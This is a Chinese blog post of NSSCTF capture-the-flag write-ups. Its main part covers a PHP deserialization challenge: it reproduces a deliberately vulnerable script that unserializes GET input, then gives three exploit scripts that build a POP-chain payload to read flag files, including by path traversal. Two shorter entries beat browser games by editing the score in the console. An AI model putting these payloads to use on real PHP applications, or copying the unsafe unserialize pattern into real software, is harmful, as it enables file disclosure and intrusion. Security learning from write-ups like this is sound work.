NSSCTF (3)

最新推荐文章于 2024-05-23 21:27:58 发布
最新推荐文章于 2024-05-23 21:27:58 发布
阅读量547 收藏
点赞数
分类专栏: nssctf web 进阶 文章标签: php 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61988806/article/details/130571743
版权

[GDOUCTF 2023]hate eat snake

 

我们打开js源码

 

 很明显这里当score大于60会出flag 

 score = getScore

我们寻找到了getScore方法所在的地方 

 

之后发现他存在于Snake.prototype中

 

 再控制台中给getScore赋值再空格页面

 [第五空间 2021]pklovecloud

<?php  
include 'flag.php';   #包含flag.php
class pkshow          #定义一个名为pkshow的类
{  
    function echo_name()      ##定义一个名为echo_name的方法
    {          
        return "Pk very safe^.^";       #返回Pk very safe^.^
    }  
} 

class acp             #定义一个名为acp的类
{   
    protected $cinder;  #定义一个是受保护的cinder变量
    public $neutron;    #定义一个公共的neutron变量
    public $nova;       #定义一个公共的nova变量
    function __construct()     #construct类初始化时调用
    {      
        $this->cinder = new pkshow; 初始化pkshow类
    }  
    function __toString()      #当类被当成字符串时调用
    {          
        if (isset($this->cinder))      #判断cinder的值是不是空
            return $this->cinder->echo_name();      #返回cinder里面的echo_name方法 这里用来检测cinder是不是实例化了pkshow
    }  
}  

class ace            #定义一个名为ace的类
{     
    public $filename;          #定义一个公共的filename变量
    public $openstack;         #定义一个公共的openstack变量
    public $docker;            #定义一个公共的docker变量
    function echo_name()       #定义一个echo_name函数
    {   
        $this->openstack = unserialize($this->docker);   #openstack的值等于反序列化的docker的值
        $this->openstack->neutron = $heat;  #将heat赋值给this->openstack->neutron
        if($this->openstack->neutron === $this->openstack->nova) #判断this->openstack->neutron和this->openstack->nova是不是一样
        {
        $file = "./{$this->filename}";  #这里将fileanme文件的变量当成字符串 并和./一起赋值给file
            if (file_get_contents($file))          #判断file_get_contents能不能读取文件内容
            {              
                return file_get_contents($file);  #返回文件内容
            }  
            else 
            { 
                return "keystone lost~";  
            }    
        }
    }  
}  

if (isset($_GET['pks']))   #通过get方法获取pks参数判断是不是空
{
    $logData = unserialize($_GET['pks']); #$logData等于反序列化的pks
    echo $logData;  #输出$logData
} 
else 
{ 
    highlight_file(__file__);  #高亮显示当前文件的原代码
}
?>

反推

$file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }

这里时我们要执行的 

也就是 ace类中的echo_name 

这里有绕过

 $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)

这里先将docker的值反序列化后赋值给openstack

然后openstack中的neutron等于$heat

再让neutron和nova 强匹配

这里我们可以控制docker的值当docker为空时 openstack下的netron 和 nova也一定为null

然后我们要寻找哪里可以触发echo_name我们发现

 function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }

acp类中的toString可以

但是根据construct将cinder赋值了实例pkshow  

这里我们要构造cinder = new ace 的类 这样就会调用ace的类

construct  => toString => echo_name
acp        => acp  =>    ace

exp

<?php
class pkshow{

}

class acp {
    protected $cinder;
    public  $neutron;
    public  $nova;
    function __construct(){
        $this->cinder = new ace;
    }
}

class ace {
    public $filename = "flag.php";
    public $openstack;
    public $docker;
}


$zx=new acp();
echo urlencode(serialize($zx))

?>

 

<?php
class pkshow{

}

class acp {
    protected $cinder;
    public  $neutron;
    public  $nova;
    function __construct(){
        $this->cinder = new ace;
    }
}

class ace {
    public $filename = "/nssctfasdasdflag";
    public $openstack;
    public $docker;
}


$zx=new acp();
echo urlencode(serialize($zx))

?>

 

<?php
class pkshow{

}

class acp {
    protected $cinder;
    public  $neutron;
    public  $nova;
    function __construct(){
        $this->cinder = new ace;
    }
}

class ace {
    public $filename = "../nssctfasdasdflag";
    public $openstack;
    public $docker;
}


$zx=new acp();
echo urlencode(serialize($zx))

?>

 

[HNCTF 2022 Week1]2048

 

 

f12

先知道我们要知道这里的分数是通过score表示

接下来去看js文件查找和score有关的地方

我们发现这里当得分大于20000会弹窗

 

在控制台执行得到flag

 

许允er
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
nssctf文件test
03-30
1
[SWPUCTF 2021 新生赛]traditional
03-15
3. 八卦图:八卦图是中国古典哲学中的一个概念,它可以用来表示二进制数字。 4. 加密和解密:八卦图密码可以用来加密和解密信息,它可以将信息转换为二进制数字,然后将其转换为 ASCII 码。 5. 计算机科学:八卦图...
NSSCTF
weixin_43896504的博客
07-22 2338
NSSCTF
nssctf(Web刷题)
最新发布
2302_80935968的博客
05-23 919
字符串和数字比较使用==时,字符串会先转换为数字类型再比较,若字符串以数字开头,则取开头数字作为转换结果,不能转换为数字的字符串(例如"aaa"是不能转换为数字的字符串,而"123"或"123aa"就是可以转换为数字的字符串)或null,则转换为0。在上面的示例中,name、age、isStudent、address、phoneNumber都是键,对应的值分别是字符串、数字、布尔值、嵌套的JSON对象、null。在php中,0e开头的数字会当作科学计数法解析,不管后面的值为任何东西,0的任何次幂都为0。
2024年网络安全最全[SWPU CTF]之Misc篇(NSSCTF)刷题记录⑥_nssctfmisc
2401_84300128的博客
05-03 843
flagNSSCTF
NSSCTF做题
wwwwyyyrre的博客
09-24 603
打开题目 发现是登录的界面 用admin和password试一下发现不行用dirsearch扫一下发现了git泄露 但是用githack下载不下来文件 去网上查了一下webftp 发现是一个在线php文件管理系统在这篇博客中提到,引用一下发现能直接登录phpinfo.php 拿到flag。
NSSCTF刷题
m0_63711447的博客
03-19 431
preg_match() 函数:用于进行正则表达式匹配,成功返回 1 ,否则返回 0intval ():获取变量的整数值isset()函数:在php中用来判断变量是否声明,该函数返回布尔类型的值,即true/false。isset只能用于变量,传递任何其它参数都将造成解析错误。is_string():用于检测变量是否是字符串看代码发现有三个if条件需要绕过第一个:用post对a进行传参,参数不能包含0-9的数字且要是整型绕过preg_match()函数可以用数组绕过显示go on,成功绕过。
NSSCTF做题(5)
wwwwyyyrre的博客
09-30 8039
注意 PHP>=5.3.0压缩包需要是zip协议压缩,rar不行,将木马文件压缩后,改为其他任意格式的文件都可以正常使用。然后,将文件的内容作为响应返回。其中a,b1,b2都可以用数组绕过,因为a是正则绕过,b是MD5绕过,接下来看c c强调了要传入c1不等于c2 c1,c2都要是字符串,c1c2的MD5值要相等 所以c就不能用数组绕过,可以用科学计数法0e绕过。它检查请求中是否包含文件,将文件保存到目录中,使用 生成唯一 ID,将 ID 和文件路径插入到数据库中的表中,最后将用户重定向到路由。
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1086
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
nssctf web入门(4)
qq_61988806的博客
04-16 682
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
nssctf web 入门(6)
qq_61988806的博客
04-17 1212
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
NSSCTF web学习
akxnxbshai的博客
09-30 1209
NSSCTF web刷题
nssctf web入门(2)
qq_61988806的博客
04-13 808
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
nssctf web 入门(3)
qq_61988806的博客
04-13 1146
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
nssctf web 入门(9)
qq_61988806的博客
04-18 245
可以猜测做了过滤这里可以bp跑一下看过滤了哪些尝试发现过滤了空格/**/在sql中代表注释符在mysql中这个可以用来代表空格发现--+被过滤#也不行我们试下url编码的#也就是%23成功了3个字段得到库名test_db这里提示非法操作经过尝试发现=被过滤在sql中like用于判断一个字符串是否匹配某个模式这里要在3的字段不然会报错?这里和之前的sql一样就不详细解释了如果不知道可以去看第8篇里面详细讲了这里就把空格换成了/**/和把=换成了like?在查询flag。
NSSCTF fakerandom
m0_63735735的博客
08-05 399
NSSCTF fakerandom
nssctf的jwt问3
08-17
3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值